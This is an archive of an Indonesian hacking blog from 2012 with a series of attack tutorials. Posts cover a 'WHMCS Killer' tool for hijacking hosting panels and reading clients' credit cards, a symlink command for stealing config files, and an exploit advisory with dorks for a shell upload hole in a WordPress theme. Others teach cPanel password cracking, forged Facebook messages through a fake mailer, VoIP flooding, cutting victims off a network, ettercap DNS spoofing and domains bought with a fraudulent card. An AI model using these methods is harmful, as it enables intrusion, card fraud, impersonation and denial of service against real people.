Monday, 31 December 2012

1 WHMCS KILLER V2.php

Udah ada yang pernah denger whmcs? atau whmpanel?
nah di tutorial kali ini, gw mo share cara menggunakan tools WHMCS KILLER
.
apa gunanya?
1. kita bisa login as admin dalam sebuah hosting dan bisa melakukan apa saja sesuka kita, contoh web target ada disana, nah kita tinggal edit cpanel lewat whmcs yang udah kita, bacaaa "HECK" =))
2. kita bisa dapat root cuma"
3. kita bisa dapet cpanel semau kita
4. crack VPS/SERVER
5. Carding / Read clients credit card
6. dll.
.
nah pertama lu kudu punya target whmcs yg ada 1 server dengan shell kalian.
nah biasanya di web tsb, ada tempat login client/admin
biasanya nama tmpat loginnya
/clientarea, /manage, /client /developer /billing /billingclient /bill

kita kudu dapetin config whmcs tsb dengan cara apapun, contoh dengan:
1. Symlink : praktekan command ini "

ln -s/home/user/public_html/folderclient/configuration.php
2. Root server: dengan menggunakan exploit yg bisa anda temukan di google =)) lalu baca file config whmcs
3. Jumping : tapi kayanya kemungkinan 10% cz dir yg mo di read dari group laen chmodnya beda"

.
Nah klo kita udah dapet file config, ini contoh salah satu file cofig whmcs:
------------------------------------------------------------------------------------
<?php
if(isset($_GET['licensedebug']))
{
unset($_GET['licensedebug']);
exit('Access Denied');
}
if(isset($_GET['forceremote']))
{
unset($_GET['forceremote']);
exit('Access Denied');
}
if(isset($_GET['revokelocal']))
{
unset($_GET['revokelocal']);
exit('Access Denied');
}
$license = 'Leased-d8fbbd343a2408bf7d09';
$db_host = 'localhost';
$db_username = '*****************';
$db_password = 'xS%564Ukea}|';
$db_name = '************';
$cc_encryption_hash = 'MM3hLAb9wDEUovvbwy9SSC0ElML4HfOkSHst7utuXYebjAdGYdoGFfbQRMKpSozA';
$templates_compiledir = '/home/myaccoun/whmcs_secured_folders/templates_c/';
$attachments_dir = '/home/myaccoun/whmcs_secured_folders/attachments/';
$downloads_dir = '/home/myaccoun/whmcs_secured_folders/downloads/';
$customadminpath = '__admx';
?>

-----------------------------------------------------------------------

nah klo udah dapet kaya begituan, kita masukin ke WHMCS KILLER.
oh ya password whmcs killernya
username: root
pass: toor

.
isikan identitas target dengan sempurna lalu klik submit....
dari situ ada menu" yg mudah dimengerti, mulai dari edit pass admin/client sampe read password cPANEL :D
DOWNLOAD HERE


Silahkan Sedot : Go to Hell

Tambahan
Username : 123456
Password : 123456

Sekian thx, salam Lamer

Saturday, 29 December 2012

4 Cara Mendapatkan Domain Malaysia .MY [Gratis]

Okelah kalo begitu kali ini saya mau posting tentang cara mendapatkan domain malasyia .my [[GRATIS]]
langsung Aja :


- lalu ikuti langkah sesuai gambar berikut




Friday, 28 December 2012

0 WordPress GeoPlaces Themes | shell upload vulnerability

Title      : WordPress GeoPlaces Themes | shell upload vulnerability 
Author     : Panda Undetected
Category   : web-apps
Contact    : panda-undetected@mail.com
Facebook   : hozni.monsterjack
Homepage   : http://4rtcode.net/
Vendor     : http://www.geotheme.com/
Date       : 14-Nopember-2012
Tested on  : anything OS
Dork       :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thank's to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/

4 Cara terbaru mengatur kustom domain dari Intuit di Blogger


Pada posting kali ini saya akan menjelaskan kepada kamu bagaimana cara seting kustom nama dari Intuit di Blogger.
Ok, langsung saja ikuti langkah-langkah berikut ini.

1. Daftar dulu di DNS Afraid.
2. Jika sudah klik Domains > Add A Domain into FreeDNS.



3. Masukkan nama domain kamu di situ.



4. Selanjutnya Sign In ke Intuit, setting Nameserver nya menjadi:
    ns1.afraid.org
    ns2.afraid.org
    ns3.afraid.org
    ns4.afraid.org





5. Kemudian Login ke Blogger.
6. Pilih blog yang akan menggunakan nama domain baru.
7. Pergi ke Setelan > Dasar
8. Pada bagian "Penerbitan" klik "Tambahkan domain khusus"
9. Sekarang klik pada bagian "Alihkan ke setelan lanjutan", ketik URL nama domain baru kamu menggunakan awalan "www"
10. Klik "Simpan". Kemudian blogger akan menampilkan error seperti ini "Kami tidak dapat memverifikasi otoritas Anda untuk domain ini. Kesalahan 14."


11. Perhatikan dua kode yang disorot pada gambar di atas. Itu adalah CNAME kepemilikan domain kamu yang nantinya akan digunakan untuk verifikasi kepemilikan domain.
12. Kemudian pada DNS Afraid, Manage domain kamu yang tadi.



13. Atur seperti ini, masukkan IP Blogger & CNAME Blogger kamu yang tadi.


      IP Blogger:
      216.239.32.21
      216.239.34.21
      216.239.36.21
      216.239.38.21

14. Selanjutnya ke Blogger lagi, masukkan domainnya & Simpan.



15. Selesai. Jika masih menampilkan pesan error, tunggu beberapa jam, kemudian ulangi lagi menambahkan nama domain kamu pada pengaturan Blogger.

Sekarang blog kamu sudah menjadi Top-Level Domain. Semoga bermanfaat.

sumber : Putra.la

0 Cara Mendapatkan Unlimited Top-Level Domain (TLD) Gratis



Setelah sekian lama tidak ada kabar lagi untuk mendapat Top-Level Domain (TLD) secara gratis, akhirnya saya telah menemukan cara baru untuk mendapatkannya secara unlimited & tentunya gratis. Dan domain gratis tersebut saya dapat dari Intuit dan telah saya praktekkan untuk semua member di Hosting saya, hasilnya saya telah mendapatkan domain yang saya inginkan secara gratis. Cara ini dengan menggunakan Credit Card khusus untuk Intuit yang bisa order ratusan domain Intuit dalam satu Credit Card. Nah bagi kalian yang ingin mendapat domain .com .org .net .info .biz .name secara gratis seperti saya, silakan ikuti langkah-langkah berikut!

1. Daftar Di sini untuk mendapatkan akunnya.



2. Jika sudah daftar, silakan Sign Out dari akun & biarkan akun tersebut selama 1 atau 2 hari lebih supaya akunnya tidak ditutup sama pihak Intuit. (Kalau saya sampai 2 hari, biar lebih afdol)
3. Setelah sudah 1 atau 2 hari kemudian silakan Sign In kembali di Intuit, lalu klik "Choose a domain (www.yourname.com) for your website".
4. Masukkan nama domain yang kalian inginkan.
4. Jika domain yang kalian inginkan tersedia klik "Get Domain".
5. Selanjutnya isi semua data seperti Nama, Email, Nomor HP, dll.



6. Berikutnya, jangan dicentang Domain Privacy, centang I agree to the Terms of Service dan Submit.



7 . Kemudian akan muncul halaman pop out yang tujuannya untuk meminta informasi dan alamat penagihan domain kalian (Domain yang kalian minta gratis, tapi untuk melindungi terhadap penipuan mereka membutuhkan informasi penagihan domain kalian.). Pada bagian Credit Card, masukkan Credit Card khususnya, silakan isi seperti di gambar!



8. Terakhir klik Purchase dan selamat Anda sudah mendapatkan Top-Level Domain (TLD) 1 tahun gratis!



9. Untuk mengatur Nameserver atau DNS nya silakan tunggu 24 jam sampai proses domain selesai.



10. Jika kalian mau order domain lagi cukup dihapus saja domain yang sebelumnya. (Domain tidak akan mati). Pastikan juga Nameserver atau DNS nya sudah diatur.





11. Dan ulangi lagi seperti nomor 4, begitulah sampai seterusnya. Tidak perlu menunggu 1 atau 2 hari lagi.

Dengan satu akun kita bisa order domain sepuasnya.

NB:
Bagi yang sudah punya akun Intuit yang dulu/sebelumnya bisa juga pakai cara ini.
Nameserver atau DNS hanya bisa digantikan sekali saja.
Domain hanya gratis 1 tahun dan tidak bisa diperpanjang.
Tolong jangan memperjualbelikan domain ini supaya trik ini tidak mati.

Sumber : putra.la

Wednesday, 26 December 2012

5 How to crack cpanel / Cara crack cpanel


Langsung saja...

Yang dibutuhkan :-


  • Shelled site
  • Cpanel Password Cracker (shell)


Step By Step Tutorial :-

  • Pertama buka shell kamu & lalu upload cpanel password cracker shell . Download Cpanel password cracker shell disini & Password List disini
  • Lalu scroll ke bawah & click bagian User .



  • Sekarang setelah Anda mengklik User, di bawah ini Anda akan mendapatkan semua username dari Cpanel tersebut. Jadi sekarang pindah ke langkah berikutnya, langkah berikutnya Anda akan mendapatkan daftar Sandi baik untuk serangan Dictionary. Setelah mendapatkan itu Anda harus menyalin username & tempel di blok nama pengguna (atas) & paste daftar kata sandi di blok sandi. Kemudian akhirnya klik start

Tip: Daftar Sandi harus pendek & efektif.





  • Setelah cracking selesai, di halaman berikutnya Anda akan melihat hasilnya.


  • Setelah Mendapatkan informasi login, Anda dapat login dengan pergi -> www.site.com:2082. Di sini Anda akan mendapatkan bidang login cpanel.

Tuesday, 25 December 2012

0 How to get free / Cara mendapatkan domain gratis .ME [ 1 Tahun ]

Ini adalah tutor cara mendapatkan domain gratis .ME selama 1 tahun.
FREE DOMAIN ME FOR 1 YEAR ' s
GRAB IT FAST!! Siapa cepat dia dapat :p
Contoh >>>> WWW.4RTCODE.ME <<<<



Bahan - bahan yang dibutuhkan :
1. Email Yahoo (Gmail masuk spam)
2. Jaringan internet (Ya iyalaaahhhhh... masa ya iyaa dong :D)


Step By Step :

1. Pertama-tama download: http://www.mozilla.org/en-US/thunderbird/all.html dan download thunderbird apa saja. Lalu install, kalau udah selesai buka thunderbird klik register new account, centang option gandi.net nya saja.


2. Lalu di kotak "Search" ketik nama domain yang diinginkan co: kakatua... lalu klik "Search".




3. Klik "contact@kakatua.me" ... Hingga muncul halaman selanjutnya.

4. Muncul halaman seperti dibawah, lalu klik "BUY"



5. Lalu register "New Account" di gandi.net. Isi terserah anda alamat dllnya. lalu submit. Jangan lupa Passwordnya.



6.  Setelah registrasi di gandi.net selesai, maka muncul halaman berikut.



7.  Pada tab Mailbox di gandi.net masukin password sesuai dengan registrasi di gandi.net.



8.  Setelah login maka tampilannya seperti ini.



9. Buka email yang buat registrasi di gandi.net, lalu buka email dari gandi 

[GANDI] Your Gandi Handle

Hello, and welcome to Gandi!

Further to the creation of your handle on 2012-11-22 11:15:36.805221, please note that your new Gandi handle is  KK1859-GANDI: << yang dipakai untuk login.


Lalu buka link berikut : 
Nah masukan user : KK1859-GANDI dan Password untuk login di gandi.net untuk mensetup nameserver dan lain lain.


SELAMAT MENCOBA !!!!

Update : Disini untuk melihat who.is domain .me >> http://www.domain.me/domain-search

UPDATE
GUNAKAN IP BELANDA  [entah ganti proxy (cari di hidemyass) atau VPN belanda atau SSH belanda] ane pake cyberghost VPN.


Wednesday, 12 December 2012

0 Cara Inbox Siapapun Memakai Akun Siapapun Di Facebook

Pada kesempatan kali ini,saya akan share trik yang lumayan iseng,yaitu cara menginbox siapapun menggunakan akun siapapun di Facebook,siapapun yang saya maksudkan disini adalah teman Anda di Facebook. Namun sebelum menerangkan cara-caranya,ada baiknya saya sampaikan bahwa "gunakan trik ini dengan bijak,jangan salah gunakan hingga merugikan orang lain". Segala sesuatu murni menjadi tanggung jawab Anda masing-masing.


Nah,tanpa perlu basa-basi lagi simak langkah-langkahnya berikut ini:

Langkah 1: Pertama Anda perlu memilih 2 orang dari daftar teman Anda. Satu akan menjadi pengirim  dan satu yang akan menjadi penerima tersebut.
Katakanlah kita memilih Ayu sebagai pengirim inbox dan Yudha sebagai penerima.
Langkah 2: Karena Ayu yang akan mengirimkan inbox kita perlu untuk mendapatkan email login Facebooknya. Karena email login Ayu tersembunyi kita perlu menggunakan trik import account. Caranya pergi ke Yahoo dan pilih login dengan Facebook

                                                   

Setelah Anda telah mengatur semuanya klik impor kontak dari Facebook. dan Boom, Anda memiliki hampir semua alamat email di daftar teman Anda. Pilih calon pengirim  dan salin alamat email-nya. Katakanlah email Ayu adalah ayu.sweet@yahoo.com

                                     


Langkah 3: Pergi ke http://emkei.cz/, Ini adalah layanan fake mailer yang dapat mengirim email kepada siapa pun atas nama siapa pun. Tulis alamat email pengirim di kolom From name dan From email, contoh:
From name:  ayu.sweet@yahoo.com
From email:   ayu.sweet@yahoo.com

Langkah 4: Sekarang Anda harus mengetahui email penerima. Caranya pergi ke profil Facebook calon penerima inbox dan klik tentang, dan copy email kontak mereka  [ blabla@facebook.com ].
Katakanlah email kontak  facebook Yudha adalah yudha.gayanajie @ facebook.com

Langkah 5: Kembali ke layanan fake mailer tadi dan isi form 'To:' dengan alamat email Facebook calon penerima, contoh:
To: yudha.gayanajie@ facebook.com

Langkah 6: Jangan menulis apa pun di 'Subyek:' langsung saja ke 'Text:' dan tulis apa yang ingin Anda katakan yang nantinya akan muncul di inbox korban.
Lengkapnya terlihat seperti:
                                                 




Langkah 7: Isi Captcha dan klik send.

Anda sekarang telah mengirimkan inbox dari akun teman Anda untuk akun teman Anda yang lain. Tapi dari beberapa percobaan yang saya lakukan terhadap trik ini,akan berpotensi mengakibatkan kesalah pahaman.Untuk itu sekali lagi saya tekankan " Gunakan trik ini dengan bijak,segala konsekuensi menjadi tanggung jawab Anda sendiri". Use its your own risk!!

Semoga berhasil :v

Sunday, 25 November 2012

3 Denial of Service (DoS)

Denial Of Service

A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
              June 09, 2006
 Usage:
 Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
 Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort  (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>

0 Cara Memutus koneksi dengan Tuxcut - Backtrack



Tuxcut sama saja seperti netcut, yang digunakan untuk memotong/memutus koneksi client pada jaringan Wifi/wirelles dan LAN...

Tuxcut membutuhkan modul2 lain, seperti
-arp-scan
-dsniff
-arp-tables

jika belum mempunyai ketiga itu download dan instal saja ,,,

1. arp-scan ( buka terminal lalu ketik ) :

   apt-get install arp-scan

2. dsnif

    apt-get install dsniff

3. arp-tables

    apt-get install arptables

jika sudah Download Tuxcut disini https://bitbucket.org/a_atalla/tuxcut/downloads/
saat ini yang terbaru untuk backtrack/ubuntu yang " TuxCut-3.2_all.deb "

jika sudah d download instal dengan cara mengetikan perintah :

dpkg -i TuxCut-3.2_all.deb

di sesuaikan dengan direktorinya , jika filenya di simpan d dekstop jangan lp cd Desktop dl :D

Dan jika agan ingin menjalankannya cukup ketik perintah Tuxcut di terminal...


















- klik scan untuk scanning target...
- jika sudah muncul IP klik CUT untuk memutuskan koneksi korban
- Resume untuk menyambungkan lagi koneksi korban..
- Change MAC untuk menggantu MAC address kl tdk salah..
- Klik Protect Me untuk memproteksi koneksi anda...

* saya sudah mencoba pada jaringan Wireless ataupun LAN, dan Berhasil...

Selamat Mencoba....

0 Video DNS Spoofing + Apache2 - Backtrack

0 DNS Spoofing With Ettercap - Backtrack




dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...
sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com ke www.statusbaru.com pada jaringan kabel ( LAN ) ataupun Wireles...
ok mulai...

- pertama buka etter.dns dengan perintah pada terminal :
gedit /usr/share/ettercap/etter.dns 
jika kosong cb disini gedit /usr/local/share/ettercap/etter.dns 
- Hapus semua tulisannya dan ganti dengan :
*.facebook.com A 63.141.225.196 ( 63.141.225.196 adalah ip statusbaru.com ) lalu save dan keluar
- jalankan dns_spoofing dgn perintah :
ettercap -Tqi eth0 anda -P dns_spoof -M arp // // lalu enter
ket :
eth0 adalah interface saya lihat sja dgn perintah ifconfig
dan pada // // bisa jg d isi dengan target pilihan anda..
contoh :
/target 1/ /target2/ 
dimana target 1 = default gateway dan target 2 = ip korban
ettercap -Tqi eth0 anda -P dns_spoof -M arp:remote /gateway/ /target/
tapi sy lebih senang dengan menggunakan " // // "saja :)
 - tunggu sampai target membuka www.facebook.com
jika berhasil maka di terminal akan ada jawaban : dns_spoof: [www.facebook.com] spoofed to [63.141.225.196] berarti kitasudah berhasil..

Selamat Mencoba... ^_^

Find Us on Facebook !